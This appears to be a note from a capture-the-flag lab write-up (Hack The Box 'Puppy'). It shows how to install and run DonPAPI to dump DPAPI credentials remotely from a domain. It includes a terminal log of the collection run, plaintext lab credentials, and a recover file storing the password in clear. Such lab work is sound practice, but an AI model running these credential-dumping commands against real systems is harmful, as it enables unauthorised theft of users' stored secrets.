DonPAPI is a tool written in Python that can be used to dump DPAPI credentials remotely. It supports techniques such as Pass-The-Hash and pass-the-ticket.
# Install dependencies
apt install -y python3-dev libxml2-dev libxslt1-dev zlib1g-dev gcc
pipx install donpapi   # or: pip install donpapi
DonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>
donpapi gui --bind 0.0.0.0 --port 8999
┌──(root㉿kali)-[~/Desktop/htb/season8/Puppy]
└─# donpapi collect -u steph.cooper -p 'ChefSteph2025!' -d PUPPY.HTB -t ALL
[💀] [+] DonPAPI Version 2.0.1
[💀] [+] Output directory at /root/.donpapi
[PUPPY.HTB] [+] Collecting every hostnames from PUPPY.HTB
[PUPPY.HTB] [+] Loaded 1 targets
[PUPPY.HTB] [+] Recover file available at /root/.donpapi/recover/recover_1747865372
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
┌──(root㉿kali)-[~/Desktop/htb/season8/Puppy]
└─# cat /root/.donpapi/recover/recover_1747865372
{"v": 0, "output_directory": null, "action": "collect", "keep_collecting": null, "threads": 50, "no_config": false, "target": ["ALL"], "domain": "PUPPY.HTB", "username": "steph.cooper", "password": "ChefSteph2025!", "hashes": null, "no_pass": false, "k": false, "aesKey": null, "laps": false, "dc_ip": null, "recover_file": null, "collectors": "All", "no_remoteops": false, "fetch_pvk": false, "pvkfile": null, "pwdfile": null, "ntfile": null, "mkfile": null, "lmhash": "", "nthash": ""}